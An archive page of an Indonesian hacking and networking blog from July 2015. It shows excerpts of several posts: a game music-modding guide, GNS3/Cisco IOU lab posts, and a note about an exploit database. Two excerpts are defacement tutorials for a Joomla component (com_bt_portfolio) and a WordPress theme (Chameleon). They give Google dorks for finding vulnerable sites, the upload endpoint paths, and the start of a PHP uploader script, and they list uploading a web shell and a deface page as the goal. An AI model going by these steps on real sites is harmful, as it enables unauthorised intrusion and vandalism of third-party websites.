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Showing posts from July, 2015

Cara Mengubah Backsound Music di Game ELSWORD Online

Hellloo, Sobat TKJ Cyber Art & para player Elsword dari dunia Elrios negara manapun kalian berada wkwkwk :v player els indo, india , japan, korea, mau void sekalipun :v salam kenal yo wkwk Lagi Maen elsword, bosen dengerin DG, Field, Village, SDG, Henir yg musik nya gitu2 aja kan yosh sekarang Nuenomaru akan Share Tutorial Mengubah Backsound Music di Game ELSWORD Online sebenernya sih ini tutorial Lama,, iseng2 share kali aja ada yg masih belum tau dan minat bagi yang mau maen game unyu ini wkwkkw Langsung intip Tutorialnya ok. sebelumnya kamu butuh ogg converter, karena file music di elsword pake format ogg. salah satu link nya: any Audio Converter 1. buka file elsword, masuk ke data, trus masuk ke music. nah disitu ada file music elsword. coba dengerin satu satu, trus kalau dapet lagu yang mau diganti, catet nama file nya 2. music yang bakal ngegantiin di ubah formatnya ke ogg (Kalo disini saya memakai Software FormatFactory untuk mengubah format musicnya ke ogg) 3. jika...

Tutorial deface dengan com Bt Portfolio

Hallo fans, Nuenomaru disini , maaf baru bisa posting lagi wkwkw 2 postingan/artikel sebelumnya saya share tutorial bug/celah pada web berCMS Wordpress. untuk artikel hari ini saya akan share salah satu bug/celah web berCMS Joomla  kali ini Nue akan share Exploit  Tutorial deface dengan com Bt Portfolio,  etthoo,,  ini exploit gak begitu baru  loh .. hahaha iseng2 aja share kali aja masih  crotz   bahan bahan: - PC yang tersambung dengan Internet - Xampp - Shell & Script Deface - Kopi , sabun , Lilin (hukumnya sunah wkwkw :v )   Langsung intip Tutorialnya 1. Search di google dgn dork: Dork: inurl:/index.php?option=com_bt_portfolio inurl:/bt_portfolio (Kembangin lg biar dpt banyak web yg vuln and verawan kak) 2. Pilih salah satu web target, dan masukan exploit: /administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php 3. Vuln = Blank (kalo gak salah wkwkwk) 4).Buat File Baru Berekstensi .php Contoh btport.php Dan Simpan Script ...

Cisco IOU L2 L3 lab with GNS3 | Switching in GNS3

Cisco IOS on Unix, also known as Cisco IOU,  is released for internal Cisco use only. IOU permits to run IOS natively on x86 platform while GNS3 must emulate the whole hardware. The big difference is that IOU can run more IOS instance than GNS3, but GNS3 can run real IOS version. The purpose of this article is to let you know how IOU can be integrated with GNS3 emulator software to practice switching concepts. **Pay Attention:** Cisco IOU binaries are not for public use. If you are a Cisco guy you must ask your company how you can get IOU binary files and license. Other do not have rights to use IOU images. Make sure you have... Before we start I want to make sure that you all have the required tools and softwares. I have listed down them with download links below, GNS3   - Virtual Box 4.3.12 (I had some bad experience with version 5.0, Check my article to know more VirtualBox EFAIL error ) - IO...

[Solved] GNS3 1.3.7 not working | black screen python error while launching

What's GNS3? GNS3 is a software emulator that is widely used by network professionals to practice real life network scenarios and to study for cisco exams. What I love more about GNS3 is it's community developers. These guys regularly updates this emulator software to add newly released devices and to reflect new standards and more features. More over this is best network simulation software that is available in the market for free of cost. Let me explain what was this black screen error and how i fixed it! GNS3 version 1.3.7 black screen Error Just to explore what's new on GNS3 version 1.3.7,  I downloaded GNS3 1.3.7 from official GNS3 website and installed it on my machine (I'm running Win 8 x86 machine) with all the supporting tools like Wireshark, Solarwinds and Winpcap. But the moment I try to launch my GNS3.exe application it showed up an extremely brief command prompt window, and suddenly the window disappeared within two seconds and then nothing happens. I unins...

Tutorial WordPress Chameleon theme Arbitary File Upload

Hallo fans, Nuenomaru disini , maaf baru bisa posting lagi wkwkw baru ketemu lagi >.< maaf efek lebaran + liburan... *lupa ngeBlog xixihi kali ini Nue akan share Exploit  WP Chameleon theme Arbitary File Upload,  etthoo,,  ini exploit lama  loh .. hahaha iseng2 aja share kali aja masih  crotz   bahan bahan: - PC yang tersambung dengan Internet - Xampp - Shell & Script Deface - Kopi , sabun , Lilin (hukumnya sunah wkwkw :v ) langsung aja intip tutornya Langkah-Langkah: 1).Search Di Google Gunakan Dork inurl:/wp-content/themes/cameleon/ 2).Jika Ketemu Masukan Exploit /wp-content/themes/cameleon/includes/fileuploader/upload_handler.php 3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."} 4).Buat File Baru Berekstensi .php Contoh cameleon.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit dan taruh juga shell sobat di directory yang sama dgn cameleon.php tadi :D <?php $uploadfile=...

1337day Exploit Database Come Back!

Menurut lampiran FP resmi 1337day , website mereka yang sempat tidak bisa diakses beberapa waktu lalu, kembali bisa diaakses dengan domain yang berbeda. | Walaupun dengan domain yang berbeda, namun tampilan dari web tersebut sama seperti yang sebelumnya.